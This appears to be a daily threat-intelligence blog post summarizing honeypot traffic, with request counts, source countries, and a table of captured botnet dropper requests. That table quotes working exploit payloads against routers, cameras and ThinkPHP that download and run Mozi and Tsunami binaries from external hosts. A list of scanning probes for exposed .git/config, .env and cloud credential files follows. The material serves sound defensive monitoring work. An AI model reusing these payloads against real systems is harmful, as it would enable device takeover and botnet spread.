Skip to main content
Shoggoth Industries - Security Blog
  1. Daily-Posts/

Report: 2025-04-04

·1256 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-04-04
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 18 stage 1 IP address(es), linked to 7 dropper URL(s).

There are 155 new requests that have never been observed before (these were added to the monitored request database.).

A total of 2998 requests were recorded during the day, originating from 18 different countries, with a peak of 1019 requests coming from NL.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
SCGermany
SCGermany
USDubai
USDubai
CNGeorgia

botnet_dropper_behaviour
#

remote_addrrequest
185.191.127.222POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=wget%20http%3A%2F%2F45.87.43.37%2Ftbk%20-O-%20%7C%20sh HTTP/1.1
31.170.22.205GET /cgi-bin/live_api.cgi?page=satellite_list&id=&ip=$(cd+/tmp;wget+http://31.170.22.205/dl18;busybox+wget+http://31.170.22.205/dl18;sh+dl18) HTTP/1.1
103.207.124.41GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://103.207.124.41:46234/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
185.197.140.156GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://185.197.140.156:52968/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
114.76.203.37GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1
58.58.30.134GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1
181.170.159.56GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1
87.107.80.243GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘rm -rf bejv86; wget http://176.65.134.201/bejv86 -O /tmp/.Aqua; chmod 777 /tmp/.Aqua; /tmp/.Aqua thinkphp.selfrep’ HTTP/1.1
90.214.52.113GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1
162.221.50.82GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1
207.188.188.206GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1
58.96.82.116GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1
79.116.24.116GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1
90.248.112.248GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1
211.72.164.193GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1
140.207.30.37GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1
36.27.117.227GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1
81.86.131.239GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://45.125.12.175/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86’ HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
925GET /splarm6 HTTP/1.1
964GET /check HTTP/1.1
2832GET /.s3cfg HTTP/1.1
2982GET /arm6.nn HTTP/1.1
2992GET /m68k.nn HTTP/1.1
3412GET /crm/.env.production HTTP/1.1
5311GET /static/.git/config HTTP/1.1
5361GET /IOebhLMhl1CTbFHbL95myfRX2 HTTP/1.1
5371GET /agSearch/SQlite/users/users/users/users/users/login HTTP/1.1
5381GET /agSearch/SQlite/users/users/users/users/login HTTP/1.1
5391GET /agSearch/SQlite/users/users/users/login HTTP/1.1
5401GET /agSearch/SQlite/users/users/login HTTP/1.1
5411GET /SQLiteManager/users/users/users/users/users/login HTTP/1.1
5421GET /SQLite/main.php HTTP/1.1
5431GET /SQLite/users/login HTTP/1.1
5441GET /SQLite/users/users/login HTTP/1.1
5451GET /SQLite/users/users/users/login HTTP/1.1
5461GET /SQLite/users/users/users/users/login HTTP/1.1
5471GET /SQLite/users/users/users/users/users/login HTTP/1.1
5481GET /SQlite/main.php HTTP/1.1
5491GET /SQlite/users/login HTTP/1.1
5501GET /SQlite/users/users/login HTTP/1.1
5511GET /SQlite/users/users/users/login HTTP/1.1
5521GET /SQlite/users/users/users/users/login HTTP/1.1
5531GET /SQlite/users/users/users/users/users/login HTTP/1.1
5551GET /test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/main.php HTTP/1.1
5561GET /test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/users/login HTTP/1.1
5571GET /testing/.git/config HTTP/1.1
5641GET /protected/.git/config HTTP/1.1
5651GET /sources/.git/config HTTP/1.1
5661GET /stage/.git/config HTTP/1.1
5671GET //.git/config HTTP/1.1
5681GET /blog/wp-content/themes/.git/config HTTP/1.1
5691GET /samples/.git/config HTTP/1.1
5701GET /git/.git/config HTTP/1.1
5711GET /live/.git/config HTTP/1.1
5721GET /wiki/.git/config HTTP/1.1
5781GET /misc/.git/config HTTP/1.1
5791GET /mobile/.git/config HTTP/1.1
5801GET /private/.git/config HTTP/1.1
5811GET /styles/.git/config HTTP/1.1
5821GET /libraries/.git/config HTTP/1.1
5831GET /magento/.git/config HTTP/1.1
5841GET /mail/.git/config HTTP/1.1
5851GET /node_modules/.git/config HTTP/1.1
5861GET /projects/.git/config HTTP/1.1
5871GET /release/.git/config HTTP/1.1
5881GET /services/.git/config HTTP/1.1
5891GET /old/.git/config HTTP/1.1
5901GET /old-site/.git/config HTTP/1.1
5911GET /plugins/.git/config HTTP/1.1
5921GET /portal/.git/config HTTP/1.1
5931GET /resources/.git/config HTTP/1.1
5941GET /uploads/.git/config HTTP/1.1
5951GET /system/.git/config HTTP/1.1
5961GET /legacy/.git/config HTTP/1.1
5971GET /maintenance/.git/config HTTP/1.1
5981GET /member/.git/config HTTP/1.1
6001GET /tmp/.git/config HTTP/1.1
6011GET /platform/.git/config HTTP/1.1
6021GET /sites/.git/config HTTP/1.1
6031GET /themes/.git/config HTTP/1.1
6251GET /laravel/.git/config HTTP/1.1
6261GET /resource/.git/config HTTP/1.1
6271GET /secure/.git/config HTTP/1.1
6281GET /storage/.git/config HTTP/1.1
6291GET /js/.git/config HTTP/1.1
6301GET /login/.git/config HTTP/1.1
6311GET /main/.git/config HTTP/1.1
6321GET /php/.git/config HTTP/1.1
6341GET /support/.git/config HTTP/1.1
6481GET /migrations/.git/config HTTP/1.1
6491GET /panel/.git/config HTTP/1.1
6501GET /partners/.git/config HTTP/1.1
6781GET /odinhttpcall1743775311 HTTP/1.1
6941GET /OdinHttpCall1743775311 HTTP/1.1
6951GET /Odin/http/call1743775311 HTTP/1.1
7201\x80\x00\x00(\xCA\xFE\xCA\xFE\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x86\xA5\x00\x00\x00\x03\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
7211\x00\x0E\x08\x02\x00\xDC\x80
7221GET /managemen%74; HTTP/1.1
7241\x00\x0E\x08\x88\x03J\x1Ak]\xA6x\x00\x00\x00\x00\x00
7251\x00\x0E8\x88\x03J\x1Ak]\xA6x\x00\x00\x00\x00\x00
7361GET /web/.git/config HTTP/1.1
7371GET /common/.git/config HTTP/1.1
7381GET /repos/.git/config HTTP/1.1
7391GET /repository/.git/config HTTP/1.1
7401GET /s3/.git/config HTTP/1.1
7441POST /cgi-bin/supervisor/Factory.cgi HTTP/1.1
7521GET /dot.git/config HTTP/1.1
7531GET /wp-content/themes/.git/config HTTP/1.1
7541GET /store/.git/config HTTP/1.1
7591GET /odinhttpcall1743722111 HTTP/1.1
7601GET /OdinHttpCall1743722111 HTTP/1.1
7611GET /Odin/http/call1743722111 HTTP/1.1
7641POST /php/ping.php HTTP/1.1
7651GET /test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/users/users/users/users/login HTTP/1.1
7661GET /test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/users/users/users/users/users/login HTTP/1.1
7671GET /SQLiteManager-1.2.4/main.php HTTP/1.1
7841GET /database/.git/config HTTP/1.1
7851GET /flock/.git/config HTTP/1.1
7861GET /m/.git/config HTTP/1.1
7871GET /prod.git/config HTTP/1.1
7881GET /aomanalyzer/.git/config HTTP/1.1
7891GET /blog/.git/config HTTP/1.1
7901GET /managemen%74;/actuator; HTTP/1.1
7951GET /test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/users/users/login HTTP/1.1
7961GET /test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/users/users/users/login HTTP/1.1
7981GET /C:/Users/Arkadi_PC/Downloads/kali-wordlists/dirb/big.txt HTTP/1.1
8051GET /hudson/script HTTP/1.1
8061GET /hudson/users/login HTTP/1.1
8071GET /hudson/users/users/login HTTP/1.1
8081GET /hudson/users/users/users/login HTTP/1.1
8091GET /hudson/users/users/users/users/login HTTP/1.1
8101GET /hudson/users/users/users/users/users/login HTTP/1.1
8111GET /script HTTP/1.1
8121GET /sqlite/main.php HTTP/1.1
8131GET /sqlite/users/login HTTP/1.1
8161GET /sqlite/users/users/users/users/login HTTP/1.1
8171GET /sqlite/users/users/users/users/users/login HTTP/1.1
8181GET /sqlitemanager/main.php HTTP/1.1
8191GET /sqlitemanager/users/login HTTP/1.1
8201GET /sqlitemanager/users/users/login HTTP/1.1
8211GET /sqlitemanager/users/users/users/login HTTP/1.1
8221GET /sqlitemanager/users/users/users/users/login HTTP/1.1
8231GET /sqlitemanager/users/users/users/users/users/login HTTP/1.1
8241GET /SQLiteManager/main.php HTTP/1.1
8251GET /SQLiteManager/users/login HTTP/1.1
8261GET /SQLiteManager/users/users/login HTTP/1.1
8271GET /SQLiteManager/users/users/users/login HTTP/1.1
8281GET /SQLiteManager/users/users/users/users/login HTTP/1.1
8291GET /agSearch/SQlite/users/login HTTP/1.1
8301GET /wp-includes/js/.git/config HTTP/1.1
8311GET /a/.git/config HTTP/1.1
8321GET /shop/.git/config HTTP/1.1
8331GET /wp-content/.git/config HTTP/1.1
8341GET /__macosx/.git/config HTTP/1.1
8351GET /awsconf.git/config HTTP/1.1
8361GET /beta/.git/config HTTP/1.1
8371GET /application/.git/config HTTP/1.1
8381GET /wp-content/plugins/.git/config HTTP/1.1
8391GET /.git/configf HTTP/1.1
8401GET /amphtml/.git/config HTTP/1.1
8411GET /new/.git/config HTTP/1.1
8421GET /old-cuburn/.git/config HTTP/1.1
8441GET /developer/.git/config HTTP/1.1
8511GET /qa/.git/config HTTP/1.1
8521GET /vendor/.git/config HTTP/1.1
8531GET /demo/.git/config HTTP/1.1
8541GET /site/.git/config HTTP/1.1
8551GET /SQLiteManager-1.2.4/users/login HTTP/1.1
8561GET /SQLiteManager-1.2.4/users/users/login HTTP/1.1
8571GET /SQLiteManager-1.2.4/users/users/users/login HTTP/1.1
8581GET /SQLiteManager-1.2.4/users/users/users/users/login HTTP/1.1
8591GET /SQLiteManager-1.2.4/users/users/users/users/users/login HTTP/1.1
8601GET /agSearch/SQlite/main.php HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
01019NL
1405BG
2342SC
3237GB
4202US
5174HK
6130DE
784IL
863PL
951TW
1047AZ
1143CN
1235CA
1322IN
1419NO
1519FR
1617JP
1712NG
1810KR
196IT
206BE
215LV
225AU
234CH
244ZA
254ID
264RU
274AR
284PT
293ES
303VN
313UA
322BR
332LT
341RO
351SI
361MK
371SE
381PK
391AE
401IR
411CZ

Related

Report: 2025-04-03
·1054 words
Repport Daily
Report: 2025-04-02
·576 words
Repport Daily
Report: 2025-04-01
·767 words
Repport Daily